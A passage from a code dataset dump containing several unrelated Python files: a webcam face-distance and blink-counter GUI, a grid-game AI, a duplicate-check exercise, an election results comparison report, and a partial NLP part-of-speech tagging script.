self.detector = dlib.get_frontal_face_detector()\n self.lStart, self.lEnd = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\n self.rStart, self.rEnd = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\n self.COUNTER = 0\n self.TOTAL = 0\n self.EYE_AR_CONSEC_FRAMES = 3\n self.EYE_AR_THRESH = 0.24\n # Boolean values\n self.dist_Bool = False\n self.ebc_Bool = False\n self.start_Bool = False\n # images for buttons\n distance_btn_image = tkinter.PhotoImage(file='./images/distance.png')\n eyeBlinkCount_btn_image = tkinter.PhotoImage(\n file='./images/eyeCount.png')\n start_btn_image = tkinter.PhotoImage(file=\"./images/start.png\")\n\n # open video source (by default this will try to open the computer webcam)\n self.vid = MyVideoCapture(self.video_source)\n\n # Create a canvas that can fit the above video source size\n self.window.geometry('850x550')\n self.window.configure(bg=\"white\")\n self.canvas = tkinter.Canvas(window)\n self.canvas.place(x=505, y=23)\n\n # Button for measuring distance\n tkinter.Button(window, image=distance_btn_image, border=0, borderwidth=0, highlightthickness=0,\n fg='white', command=self.dm).place(x=110, y=110)\n\n # Button for counting eyeblink\n tkinter.Button(window, image=eyeBlinkCount_btn_image, border=0, borderwidth=0, highlightthickness=0,\n fg='white', command=self.ebc).place(x=110, y=210)\n\n # Button for start\n tkinter.Button(window, image=start_btn_image, border=0, borderwidth=0, highlightthickness=0,\n fg='white', command=self.start).place(x=90, y=380)\n\n # Button for stop\n tkinter.Button(window, text=\"Stop\", border=0, borderwidth=0, highlightthickness=0, padx=12, pady=6,\n bg='red', fg='white', command=self.stop).place(x=720, y=500)\n \n # Button for clearing label\n tkinter.Button(window, text='Clear', border=0, borderwidth=0, highlightthickness=0, padx=12, pady=6,\n bg='red', fg='white', command=self.clear).place(x=800, y=500)\n\n # Brightness controller \n v1 = tkinter.DoubleVar()\n v1.set(brightness.current_brightness)\n tkinter.Scale(window, from_=1, to=100, bg=\"white\", label=\"Brightness\",\n highlightthickness=0, length=200, command=lambda val: brightness.set_brightness(val), variable=v1).place(x=300, y=100)\n\n tkinter.Scale(window, from_=1, to=100, bg=\"white\", label=\"Yellow\",\n highlightthickness=0, length=200).place(x=400, y=100)\n\n # Label for displaying distance\n self.dist_label = tkinter.Label(\n window, text=\"\", pady=12, padx=18,\n bg=\"#008cff\", fg='white')\n 
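# the distance label is filled in by self.distance() with the detected face contour area\n 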
self.dist_label.place(x=420, y=380)\n\n # Label for displaying eye blink count\n self.blink_count_label = tkinter.Label(\n window, text=\"\", pady=12, padx=18,\n bg=\"#008cff\", fg='white')\n self.blink_count_label.place(x=590, y=380)\n\n self.delay = 1\n self.update()\n\n self.window.mainloop()\n\n def dm(self):\n self.dist_Bool = True\n self.ebc_Bool = False\n self.start_Bool = False\n\n def ebc(self):\n self.dist_Bool = False\n self.ebc_Bool = True\n self.start_Bool = False\n\n def stop(self):\n self.dist_Bool = False\n self.ebc_Bool = False\n self.start_Bool = False\n\n def start(self):\n self.dist_Bool = False\n self.ebc_Bool = False\n self.start_Bool = True\n\n def clear(self):\n self.dist_label['text'] = \"\"\n self.blink_count_label['text'] = \"\"\n self.TOTAL = 0\n\n def update(self):\n # Get a frame from the video source\n ret, frame = self.vid.get_frame()\n if ret:\n newframe = cv2.resize(\n frame, (int(frame.shape[1]/2), int(frame.shape[0]/2)))\n self.photo = PIL.ImageTk.PhotoImage(\n image=PIL.Image.fromarray(newframe))\n self.canvas.create_image(0, 0, image=self.photo, anchor=tkinter.NW)\n\n if self.dist_Bool and self.start_Bool is False:\n self.distance(frame)\n if self.ebc_Bool and self.start_Bool is False:\n self.eye_blink_count(frame)\n if self.start_Bool:\n self.distance(frame)\n self.eye_blink_count(frame)\n\n self.window.after(self.delay, self.update)\n\n def distance(self, frame):\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n rects = self.detector(gray, 0)\n for rect in rects:\n shape = self.predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n area = cv2.contourArea(\n np.reshape(shape, (68, 1, 2)))\n self.dist_label['text'] = area\n if area > 15000:\n self.dist_label['bg'] = 'red'\n else:\n self.dist_label['bg'] = 'green'\n\n def eye_aspect_ratio(self, eye):\n A = dist.euclidean(eye[1], eye[5])\n B = dist.euclidean(eye[2], eye[4])\n C = dist.euclidean(eye[0], eye[3])\n ear = (A + B) / (2.0 * C)\n return ear\n\n def eye_blink_count(self, frame):\n leftEAR = 0\n rightEAR = 0\n ear = 0\n leftEye = 0\n rightEye = 0\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n rects = self.detector(gray, 0)\n for rect in rects:\n shape = self.predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n leftEye = shape[self.lStart:self.lEnd]\n rightEye = shape[self.rStart:self.rEnd]\n leftEAR = self.eye_aspect_ratio(leftEye)\n rightEAR = self.eye_aspect_ratio(rightEye)\n\n ear = (leftEAR + rightEAR)/2.0\n try:\n leftEyeHull = cv2.convexHull(leftEye)\n rightEyeHull = cv2.convexHull(rightEye)\n cv2.drawContours(\n frame, [leftEyeHull], -1, (0, 255, 0), 1)\n cv2.drawContours(\n frame, [rightEyeHull], -1, (0, 255, 0), 1)\n if ear < self.EYE_AR_THRESH:\n self.COUNTER += 1\n else:\n if self.COUNTER >= self.EYE_AR_CONSEC_FRAMES:\n self.TOTAL += 1\n self.COUNTER = 0\n self.blink_count_label['text'] = self.TOTAL\n except Exception as e:\n print(e, 'eye blink count error')\n\n\nclass MyVideoCapture:\n def __init__(self, video_source=0):\n # Open the video source\n self.vid = cv2.VideoCapture(video_source)\n\n if not self.vid.isOpened():\n raise ValueError(\"Unable to open video source\", video_source)\n\n # Get video source width and height\n self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n def get_frame(self):\n if self.vid.isOpened():\n ret, frame = self.vid.read()\n frame = cv2.flip(frame, 1)\n if ret:\n return (ret, cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n else:\n return (ret, None)\n else:\n return (False, 
None)\n\n # Release the video source when the object is destroyed\n def __del__(self):\n if self.vid.isOpened():\n self.vid.release()\n\n\nApp(tkinter.Tk(), \"Tkinter and OpenCV\")\n","sub_path":"main6.py","file_name":"main6.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"310785949","text":"import random\n\nclass AI:\n def __init__(self,mark):\n self.mark = mark\n self.attack_strategies = []\n self.defence_strategies = []\n f1 = self.vertical_strategies\n f2 = self.horizontal_strategies\n f3 = self.diagonal1_strategies\n f4 = self.diagonal2_strategies\n self.strategy_functions = (f1,f2,f3,f4)\n\n def update_defence_strategies(self,x,y):\n for strategy in self.defence_strategies:\n if (x,y) in strategy:\n strategy.remove((x,y))\n\n\n def update_attack_strategies(self,x,y):\n for strategy in self.attack_strategies:\n if (x,y) in strategy:\n strategy.remove((x,y))\n\n\n def delete_attack_strategies(self,x,y):\n a = self.attack_strategies\n self.attack_strategies = [s for s in a if (x,y) not in s]\n\n\n def delete_defence_strategies(self,x,y):\n d = self.defence_strategies\n self.defence_strategies = [s for s in d if (x,y) not in s]\n\n\n def one_left(self):\n for strategy in self.attack_strategies:\n if len(strategy) == 1:\n return next(iter(strategy)) # Get the only element\n\n for strategy in self.defence_strategies:\n if len(strategy) == 1:\n return next(iter(strategy)) # Get the only element\n\n return None\n\n\n def attack_defence_union(self):\n # This is unused\n for a_strategy in self.attack_strategies:\n for d_strategy in self.defence_strategies:\n union = a_strategy & d_strategy\n if len(union) > 0:\n # Get one element from the union set\n return next(iter(union)) \n\n return None\n\n\n def shortest_strategy(self,needed):\n if self.attack_strategies and self.defence_strategies:\n # Both not empty\n attack = self.shortest_attack()\n defence = self.shortest_defence()\n shortest_strategy = min(attack,defence,key=len) \n\n elif self.attack_strategies and not self.defence_strategies:\n # Defence empty, attack not empty\n shortest_strategy = self.shortest_attack()\n\n elif self.defence_strategies and not self.attack_strategies:\n # Attack empty, defence not empty\n shortest_strategy = self.shortest_defence()\n\n if len(shortest_strategy) <= needed // 2 + 1:\n return next(iter(shortest_strategy)) \n\n return None\n\n\n def shortest_attack(self):\n candidate = self.attack_strategies[0]\n for strategy in self.attack_strategies:\n if len(strategy) < len(candidate):\n candidate = strategy\n return candidate\n\n\n def shortest_defence(self):\n candidate = self.defence_strategies[0]\n for strategy in self.defence_strategies:\n if len(strategy) < len(candidate):\n candidate = strategy\n return candidate\n\n\n\n def random_from_strategies(self):\n s = random.choice(self.defence_strategies + self.attack_strategies)\n return random.sample(s,1)[0]\n\n\n def random_from_empty_slots(self,board):\n return random.sample(board.empty_slots,1)[0]\n\n\n def most_common(self):\n all_coords = []\n\n for strat in self.attack_strategies + self.defence_strategies:\n all_coords += list(strat)\n\n most_common = all_coords[0]\n most_common_amount = all_coords.count(most_common)\n\n for candidate in all_coords:\n candidate_amount = all_coords.count(candidate)\n if candidate_amount > most_common_amount:\n most_common = candidate\n most_common_amount = candidate_amount\n\n if most_common_amount == 1:\n return None\n\n 
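# return the coordinate that appears in the largest number of live strategies\n 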
return most_common\n\n\n def make_decision(self,needed,board):\n if not self.attack_strategies and not self.defence_strategies:\n # Both strategies empty\n return self.random_from_empty_slots(board)\n\n move = self.one_left()\n if move is not None:\n return move\n\n move = self.shortest_strategy(needed)\n if move is not None:\n return move\n\n move = self.most_common()\n if move is not None:\n return move\n\n return self.random_from_strategies()\n \n\n def make_a_move(self,board,needed,x,y):\n self.delete_attack_strategies(x,y)\n self.update_defence_strategies(x,y)\n self.new_defence_strategies(board,needed,x,y)\n \n move = self.make_decision(needed,board)\n\n self.delete_defence_strategies(move[0],move[1])\n self.update_attack_strategies(move[0],move[1])\n self.new_attack_strategies(board,needed,move[0],move[1])\n\n return move\n\n\n def new_defence_strategies(self,board,needed,x,y,):\n for f in self.strategy_functions:\n for strategy in f(board,needed,x,y):\n self.defence_strategies.append(strategy)\n\n\n def new_attack_strategies(self,board,needed,x,y,):\n for f in self.strategy_functions:\n for strategy in f(board,needed,x,y):\n self.attack_strategies.append(strategy)\n\n\n\n def vertical_strategies(self,board,needed,recentX,recentY):\n # Vertical strategies. Base moves down\n strategies = []\n for i in range(needed):\n y = recentY+i\n strategy = set()\n \n for j in range(needed):\n strategy.add((recentX,y-j))\n strategy.remove((recentX,recentY))\n\n for coord in strategy:\n if coord not in board.empty_slots:\n break\n else:\n strategies.append(strategy)\n\n return strategies\n\n\n def horizontal_strategies(self,board,needed,recentX,recentY):\n # Horizontal strategies. Base moves left.\n strategies = []\n for i in range(needed):\n x = recentX-i\n strategy = set()\n\n for j in range(needed):\n strategy.add((x+j,recentY))\n strategy.remove((recentX,recentY))\n\n for coord in strategy:\n if coord not in board.empty_slots:\n break\n else:\n strategies.append(strategy)\n \n return strategies\n\n\n def diagonal1_strategies(self,board,needed,recentX,recentY):\n # Diagonal strategies. Base moves downleft.\n strategies = []\n for i in range(needed):\n x = recentX-i\n y = recentY+i\n strategy = set()\n\n for j in range(needed):\n strategy.add((x+j,y-j))\n strategy.remove((recentX,recentY))\n\n for coord in strategy:\n if coord not in board.empty_slots:\n break\n else:\n strategies.append(strategy)\n\n return strategies\n\n\n def diagonal2_strategies(self,board,needed,recentX,recentY):\n # Diagonal strategies. 
Base moves downright.\n strategies = []\n for i in range(needed):\n x = recentX+i\n y = recentY+i\n strategy = set()\n\n for j in range(needed):\n strategy.add((x-j,y-j))\n strategy.remove((recentX,recentY))\n\n for coord in strategy:\n if coord not in board.empty_slots:\n break\n else:\n strategies.append(strategy)\n\n return strategies\n\n","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"420223402","text":"'''\nGiven an integer array nums, return true if any value appears at least twice in the array, and return false if every element is distinct.\nInput: nums = [1,2,3,1]\nOutput: true\n'''\n\ndef containsDuplicateDict(nums):\n seen = {}\n for num in nums:\n if num in seen:\n return True\n seen[num] = 0\n\n return False\n\ndef containsDuplicateSorted(nums):\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] == nums[i - 1]:\n return True\n \n return False","sub_path":"217.contains_duplicate.py","file_name":"217.contains_duplicate.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"10269231","text":"\"\"\"Comparison rpt.py\n\n Submodule to dbase.py for constructing the Comparison Report,\n which contains data merged from data imported from the Elections\n department and data accumulated by our vote counting.\n\n Usage: from comparison_rpt import ElectionRpt\n er = ElectionRpt()\n print(er.header_line())\n for row in er.run(election_data_iter, our_data_iter):\n print(row)\n\n Possible input iterables include SQL selections.\n Possible output includes CSV.\"\"\"\n\nfrom __future__ import annotations\nfrom collections.abc import Iterable, Callable\nfrom util import divz\n\nclass SimpleRepr(object): # https://stackoverflow.com/questions/44595218/python-repr-for-all-member-variables\n \"\"\"A mixin implementing a simple __repr__.\"\"\"\n def __repr__(self):\n return \"<{klass} @{id:x} {attrs}>\".format(\n klass=self.__class__.__name__,\n id=id(self) & 0xFFFFFF,\n attrs=\" \".join(\"{}={!r}\".format(k, v) for k, v in self.__dict__.items()),\n )\n\n# def rpt_brk_last(a, b):\n# # Return the last instance seen, ignoring the rest\n# return b\n#\n# class RptBreak(SimpleRepr):\n# \"\"\"Accumulate some data and return it a key value changes.\n#\n# The key values must respond to !=\n#\n# The accumulated values can be any objects that are collected\n# in a list until a break in the key values is seen.\n# \"\"\"\n#\n# def __init__(self, num_keys:int, num_accumulators:int):\n# self.key_values = [None] * num_keys\n# self.accums = [[]] * num_accumulators\n# self.first = True\n#\n# def next(self, key_values:list, objs:list[object]):\n# assert len(key_values) == len(self.key_values), 'wrong number of keys'\n# assert len(objs) == len(self.sum_values), 'wrong number of values'\n# if self.first:\n# self.key_values = key_values\n# self.accums = objs\n# self.first = False\n# return None\n#\n# if key_values != self.key_values:\n# self.key_values = key_values\n# ret = self.accums.copy()\n# self.accums = objs\n# return ret\n#\n# else:\n# for i in len(self.accums):\n# self.accums[i].append(objs[i])\n#\n# return None\n#\n# def last(self):\n# return self.accums\n\n\nclass Choice(SimpleRepr):\n \"\"\"One of the choices in a PrecinctContest\"\"\"\n\n def __init__(self, choice_name:str):\n self.choice_name = choice_name\n # data from Elections\n self.elec_votes = 0\n 
self.elec_winner_f = False # flag if this choice is a winner\n # data from our counts\n self.our_votes = 0\n self.our_winner_f = False # flag if this choice is a winner\n self.our_range_low = 0\n self.our_range_high = 0\n self.discrepancy = '' # elec votes vs our range\n self.winners = '' # our winner vs elec\n\n\nclass PrecinctContest(SimpleRepr):\n \"\"\"A contest for a specific precinct with N choices.\"\"\"\n\n def __init__(self, precinct:str, contest:str):\n self.precinct = precinct\n self.contest = contest\n self.elec_unrslvd_wi = 0 # elec unresolved write-ins\n self.elec_undervotes = 0\n self.elec_overvotes = 0\n self.ballots_cast = 0 # see elecs_computed_bc\n self.elecs_computed_bc = 0 # ballots cast recomputed\n self.elec_margin = 0\n self.choices:dict[Choice] = dict()\n self.votes_allowed = None\n self.num_images = 0\n self.page_nums = list()\n self.our_unrslvd_wi = 0 # Our unresolved write-ins\n self.our_undervotes = 0 # our underevotes\n self.our_overvotes = 0 # our overvotes\n self.our_undetrmd = 0 # our undetermined (aka \"suspicious\")\n self.marked_unsuspic = 0 # number of unsuspicious marked choices\n self.cnt_unsuspic = 0 # count of unsuspicious choices\n self.our_mc_ratio = 0 # ratio of marked to total choices\n self.disagree_winner_f = False # we disagree with elecs on winner\n\n def add_elec_data(self, elec_overvotes, elec_undervotes, ballots_cast):\n self.elec_undervotes = elec_undervotes\n self.elec_overvotes = elec_overvotes\n self.ballots_cast = ballots_cast\n\n def add_our_data(self, undervotes, overvotes, votes_allowed,\n suspicion, num_images, page_num, marked_unsuspic,\n cnt_unsuspic):\n self.our_undervotes = undervotes\n self.our_overvotes = overvotes\n self.votes_allowed = votes_allowed\n self.our_undetrmd = suspicion\n self.num_images = num_images\n self.marked_unsuspic = marked_unsuspic # number of unsuspicious marked choices\n self.cnt_unsuspic = cnt_unsuspic # count of unsuspicious choices\n self.add_page_num(page_num)\n\n def add_page_num(self, page_num):\n if page_num not in self.page_nums:\n self.page_nums.append(page_num)\n\n def disp_page_nums(self)->str:\n \"\"\"Return page numbers separated by spaces\"\"\"\n\n return ','.join(sorted(self.page_nums))\n\n def same(self, other:PrecinctContest)->bool:\n \"\"\"Close enough to be the same\"\"\"\n\n return type(other) == type(self) \\\n and self.precinct == other.precinct \\\n and self.contest == other.contest\n\n def add_choice_elec(self, choice:Choice):\n \"\"\"Add a choice with elecs data\"\"\"\n\n assert choice.choice_name not in self.choices\n self.choices[choice.choice_name] = choice\n\n def update_choice_ours(self, choice_name:str, our_votes:int):\n \"\"\"Call with one choice which usually is already here\n from elec data and add our info.\"\"\"\n\n c = self.choices.get(choice_name, Choice(choice_name))\n c.our_votes = our_votes\n\n def vote_gap(self):\n \"\"\"Return (low, high) the difference between our lowest\n and highest estimate for this contest.\"\"\"\n\n low = - (self.votes_allowed * self.our_undetrmd)\n high = self.votes_allowed * (self.our_overvotes + \\\n self.our_undetrmd) \\\n + self.our_unrslvd_wi\n return low, high\n\nclass ElectionRpt(SimpleRepr):\n \"\"\"Container for all Precinct_contests in an election.\"\"\"\n\n def __init__(self):\n\n # the key for pct_contests is (precinct_name, contest_name)\n self.pct_contests:dict[PrecinctContest] = dict()\n\n def run(self, elec_rows:Iterable, our_rows:Iterable):\n \"\"\"This is the MAIN.\"\"\"\n\n self._load_elec_results(elec_rows)\n 
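# fold our counts into the contests built from the Elections data\n 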
self._merge_our_results(our_rows)\n self._compute_elecs_ballot_count()\n self._create_totals()\n self._compute_winners()\n self._compute_our_ranges()\n for t in self._output_rows():\n yield t\n\n def _add_contest(self, pc: PrecinctContest):\n t = pc.precinct, pc.contest\n assert t not in self.pct_contests\n self.pct_contests[t] = pc\n\n def _load_elec_results(self, elec_rows):\n \"\"\"Deserialize elec_rows into the pct_contests structure.\"\"\"\n\n first_time = True\n curr_contest = None\n for row in elec_rows:\n next_contest = PrecinctContest(row.pct, row.contest)\n next_contest.add_elec_data(row.num_overvotes,\n row.num_undervotes, row.ballots_cast)\n if first_time:\n curr_contest = next_contest\n first_time = False\n if not curr_contest.same(next_contest):\n self._add_contest(curr_contest)\n curr_contest = next_contest\n\n choice = Choice(row.choice)\n if 'write-ins' in choice.choice_name.lower():\n curr_contest.elec_unrslvd_wi += row.num_votes\n continue # we don't add this as a choice\n\n choice.elec_votes = row.num_votes\n curr_contest.add_choice_elec(choice)\n\n self._add_contest(curr_contest) # close contest after last row\n\n def _merge_our_results(self, our_rows):\n \"\"\"Merge our results into the precinct/contests from elecs\"\"\"\n\n for row in our_rows:\n key = row.precinct, row.contest_name\n pc = self.pct_contests.get(key,\n PrecinctContest(row.precinct, row.contest_name))\n pc.add_our_data(row.undervotes_by_pct, row.overvotes_by_pct,\n row.votes_allowed, row.suspicion_by_pct,\n row.num_images, row.page_number, row.marked,\n row.cnt_unsuspic)\n if 'write in' in row.choice_name.lower():\n pc.our_unrslvd_wi += row.votes_by_pct\n continue # Don't treat this as a choice.\n pc.update_choice_ours(row.choice_name, row.votes_by_pct)\n\n def _compute_elecs_ballot_count(self):\n # For sides 1 & 2 thus will get the same value as\n # pc.ballots_cast. 
For sides 3 and 4 it will give\n # a better value for comparing to our image count.\n\n for pc in self.pct_contests.values():\n x = pc.votes_allowed * pc.elec_overvotes \\\n + pc.elec_unrslvd_wi + pc.elec_undervotes \\\n + sum([z.elec_votes for z in pc.choices.values()])\n pc.elecs_computed_bc = x / pc.votes_allowed\n\n def _create_totals(self):\n \"\"\"Add a pseudo precinct for county-wide totals.\"\"\"\n\n totl = ' Cnty'\n newpccs = dict()\n for pc in self.pct_contests.values():\n k = totl, pc.contest\n newpc = newpccs.get(k, PrecinctContest(totl, pc.contest))\n newpc.ballots_cast += pc.ballots_cast\n newpc.elecs_computed_bc += pc.elecs_computed_bc\n newpc.num_images += pc.num_images\n newpc.elec_unrslvd_wi += pc.elec_unrslvd_wi\n newpc.elec_undervotes += pc.elec_undervotes\n newpc.elec_overvotes += pc.elec_overvotes\n newpc.our_unrslvd_wi += pc.our_unrslvd_wi\n newpc.our_undervotes += pc.our_undervotes\n newpc.our_overvotes += pc.our_overvotes\n newpc.our_undetrmd += pc.our_undetrmd\n newpc.votes_allowed = pc.votes_allowed\n newpc.cnt_unsuspic += pc.cnt_unsuspic\n newpc.marked_unsuspic += pc.marked_unsuspic\n for n in pc.page_nums:\n newpc.add_page_num(n)\n\n newchoices = newpc.choices\n for chk in pc.choices.keys():\n newchoice = newchoices.get(chk, Choice(chk))\n pcc = pc.choices[chk]\n newchoice.elec_votes += pcc.elec_votes\n newchoice.our_votes += pcc.our_votes\n newchoice.our_range_low += pcc.our_range_low\n newchoice.our_range_high += pcc.our_range_high\n newchoices[chk] = newchoice\n\n newpc.choices = newchoices\n newpccs[k] = newpc\n\n for k in newpccs.keys():\n self.pct_contests[k] = newpccs[k]\n\n def _compute_our_ranges(self):\n \"\"\"Compute our low and high values and discrepancy.\"\"\"\n\n for pc in self.pct_contests.values():\n chcs = pc.choices.values()\n # tot_choices = len(chcs)\n # num_marked = sum([ch.our_votes for ch in chcs])\n marked_ratio = pc.marked_unsuspic / pc.cnt_unsuspic\n for ch in chcs:\n if ch.our_votes:\n ch.our_range_low = ch.our_votes\n ch.our_range_high = \\\n ch.our_votes \\\n + pc.our_unrslvd_wi \\\n + pc.votes_allowed * pc.our_overvotes\n if pc.our_undetrmd:\n r = 1 - marked_ratio\n reduction = min(round(pc.our_undetrmd * r),1)\n ch.our_range_low -= reduction\n r = marked_ratio\n enhancement = min(round(pc.our_undetrmd * r),1)\n ch.our_range_high += enhancement\n\n # compute discrepancy field\n d = ''\n if ch.elec_votes < ch.our_range_low:\n d = ch.elec_votes - ch.our_range_low\n elif ch.elec_votes > ch.our_range_high:\n d = ch.elec_votes - ch.our_range_high\n if d != '':\n ch.discrepancy = f'{d:+}'\n\n def _compute_winners(self):\n # compute margin and then winners by election counts and our counts\n for pc in self.pct_contests.values():\n choices = pc.choices.values()\n\n # compute margins based on election votes\n srt_ch = sorted(choices, key=lambda ch: ch.elec_votes,\n reverse=True)\n if len(srt_ch) <= pc.votes_allowed:\n pc.elec_margin = srt_ch[-1].elec_votes\n else:\n pc.elec_margin = srt_ch[pc.votes_allowed - 1].elec_votes - \\\n srt_ch[pc.votes_allowed].elec_votes\n\n # flag election winners\n for i in range(pc.votes_allowed):\n ch = srt_ch[i]\n v = ch.elec_votes\n if v > 0:\n ch.winners += '<'\n\n\n srt_ch = sorted(choices, key=lambda ch: ch.our_votes,\n reverse=True)\n # flag our winners\n for i in range(pc.votes_allowed):\n ch = srt_ch[i]\n v = ch.our_votes\n if v > 0:\n ch.winners += '>'\n\n def header_line(self):\n return (\"Precinct\", \"Contest\", \"Choice\", \"Elec 
Votes\",\n \"Notes\", \"Our Low\", \"Our High\", \"Out of Range\",\n \"Est. Elec Ballots Cast\", \"Our Number of Images\",\n \"Ball Cast - # Imgs\", \"Side Number\",\n \"Elec Invalid Write In\", \"Our Unresolved Write In\",\n \"Elec Overvotes\", \"Our Overvotes\",\n \"Elec Undervotes\", \"Our Undervotes\", \"Our Tentative\")\n\n def _build_output_row(self, pc:PrecinctContest, ch:Choice):\n \"\"\"Return a detail row\"\"\"\n\n return \\\n [pc.precinct, pc.contest, ch.choice_name, ch.elec_votes,\n ch.winners, ch.our_range_low, ch.our_range_high,\n ch.discrepancy]\n\n def _output_rows(self):\n \"\"\"Yield output rows interleaving breaks on contest.\"\"\"\n\n # output the detail lines\n num_cols = len(self.header_line())\n for k in sorted(self.pct_contests.keys()):\n pc = self.pct_contests[k]\n sum_elec_votes = sum_our_votes = 0\n for ch in sorted(pc.choices.values(),\n key=lambda cho: cho.elec_votes,\n reverse=True):\n sum_our_votes += ch.our_votes\n sum_elec_votes += ch.elec_votes\n outrow = self._build_output_row(pc, ch)\n outrow += (num_cols - len(outrow)) * ['']\n yield outrow\n\n # output the summary at the bottom\n vg = pc.vote_gap()\n r = vg[1] - vg[0]\n rm = divz(r, pc.elec_margin) # R/M ratio\n break_row = [pc.precinct, pc.contest,\n (f'R/M: {rm:.0%}; Totals: '), sum_elec_votes,\n '*' if rm >= 1 else '',\n sum_our_votes + vg[0], sum_our_votes + vg[1],\n '', # Out of Range Column\n pc.elecs_computed_bc, pc.num_images,\n abs(pc.elecs_computed_bc - pc.num_images),\n pc.disp_page_nums(),\n pc.elec_unrslvd_wi, pc.our_unrslvd_wi,\n pc.elec_overvotes, pc.our_overvotes,\n pc.elec_undervotes, pc.our_undervotes,\n pc.our_undetrmd]\n\n yield break_row\n yield [''] * num_cols # blank row\n","sub_path":"rpts/comparison_rpt.py","file_name":"comparison_rpt.py","file_ext":"py","file_size_in_byte":16101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"648391848","text":"#coding: utf-8\nfrom analisarFoto import analisarImagem\nfrom eventosHardware import *\n\ni = 1\nwhile i >= 1:\n\ti += 1\n\tif i == 3:\n\t\tprint(\"Aguardando o botão ser pressionado\")\n\tif capturarEvento() == 1:\n\t\tprint(analisarImagem())\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"521070242","text":"import random\nimport nltk\nfrom nltk.corpus import stopwords\nimport datetime\n\n# read file and append a list of all lines\ndef file_to_list(src_file, total_list):\n with open(src_file, 'r', encoding='utf-8') as source_file:\n for line in source_file:\n total_list.append(line)\n return\n\n\n# check and return\n# pos_tokens = [-1, -1, '', ''] , line number, match or not, position, token, pos attribute\n# pos sequence: NN, VERB, ADJ\ndef check_pos_token(src_line, stoplist):\n src_tokens = src_line.split()\n tagged = nltk.pos_tag(src_tokens)\n pos_tokens = [[-1, -1, '', ''], [-1, -1, '', ''], [-1, -1, '', '']]\n\n for i in range(len(src_tokens)):\n # not process stopwords and non-unique words in the same sentence\n if src_tokens[i] in stoplist:\n continue\n if src_tokens.count(src_tokens[i]) != 1:\n continue\n if tagged[i][1].find('N') == 0 and pos_tokens[0][0] < 0:\n pos_tokens[0][0] = 1\n pos_tokens[0][1] = i\n pos_tokens[0][2] = src_tokens[i]\n pos_tokens[0][3] = tagged[i][1]\n if tagged[i][1].find('V') == 0 and pos_tokens[1][0] < 0:\n pos_tokens[1][0] = 1\n pos_tokens[1][1] = i\n pos_tokens[1][2] = src_tokens[i]\n 
pos_tokens[1][3] = tagged[i][1]\n        if tagged[i][1].find('J') == 0 and pos_tokens[2][0] < 0:\n            pos_tokens[2][0] = 1\n            pos_tokens[2][1] = i\n            pos_tokens[2][2] = src_tokens[i]\n            pos_tokens[2][3] = tagged[i][1]\n    return pos_tokens\n\n\n# Calculate the total number of lines in a text file\ndef cal_lines(source_txt):\n    number_lines = 0\n    with open(source_txt, 'r', encoding='utf-8') as source_file:\n        for line in source_file:\n            number_lines += 1\n    source_file.close()\n    return number_lines\n\n\n# Insert a tag with its token into a line of text\ndef insert_cw_tag(line, tag, flag_noun, token_noun, posi_noun, flag_verb, token_verb, posi_verb, flag_adj,\n                  token_adj, posi_adj):\n    if tag == 'CW':\n        open_copy = ''\n        close_copy = ''\n        list_token = line.split()\n        list_token.append('\\n')\n        # replace the token at 'position' to 'token' and return\n        # sort and replace from the latter position to the beginning position\n        insert_list = [[-1, '']]\n        if flag_noun > 0:\n            insert_list.append([posi_noun, token_noun])\n        if flag_verb > 0:\n            insert_list.append([posi_verb, token_verb])\n        if flag_adj > 0:\n            insert_list.append([posi_adj, token_adj])\n        insert_list.pop(0)\n        print('insert list')\n        print(insert_list)\n        insert_list.sort(key=lambda x: x[0], reverse=True)\n        if len(insert_list) > 0:\n            for i in range(len(insert_list)):\n                list_token.pop(insert_list[i][0])\n                list_token.insert(insert_list[i][0], open_copy + ' ' + insert_list[i][1] + ' ' + close_copy)\n    return ' '.join(list_token)\n\n\ndef pos_process_src(read_file, write_file, src_noun_list, src_verb_list, src_adj_list):\n    line_number_noun = src_noun_list[0][0]\n    src_token_noun = src_noun_list[0][3]\n    # src_pos_noun = src_noun_list[0][4]\n    total_process_lines_noun = len(src_noun_list)\n    line_number_verb = src_verb_list[0][0]\n    src_token_verb = src_verb_list[0][3]\n    # src_pos_verb = src_verb_list[0][4]\n    total_process_lines_verb = len(src_verb_list)\n    line_number_adj = src_adj_list[0][0]\n    src_token_adj = src_adj_list[0][3]\n    # src_pos_adj = src_adj_list[0][4]\n    total_process_lines_adj = len(src_adj_list)\n    j_noun = 0\n    j_verb = 0\n    j_adj = 0\n    flag_noun = -1\n    flag_verb = -1\n    flag_adj = -1\n    line_number = 0\n    with open(read_file, 'r', encoding='utf-8') as source_file, open(write_file, 'w',\n                                                                     encoding='utf-8') as target_file:\n        for line in source_file:\n            if line_number % 3000 == 0:\n                print(datetime.datetime.now(), 'reading and writing, line ', line_number)\n            if j_noun < total_process_lines_noun and line_number == line_number_noun:\n                # insert pos tag with token to the specific line\n                flag_noun = 1\n\n            if j_verb < total_process_lines_verb and line_number == line_number_verb:\n                # insert pos tag with token to the specific line\n                flag_verb = 1\n\n            if j_adj < total_process_lines_adj and line_number == line_number_adj:\n                # insert pos tag with token to the specific line\n                flag_adj = 1\n\n            # insert pos tag with token to the specific line\n            if flag_noun > 0 or flag_verb > 0 or flag_adj > 0:\n                line = insert_cw_tag(line, 'CW', flag_noun, 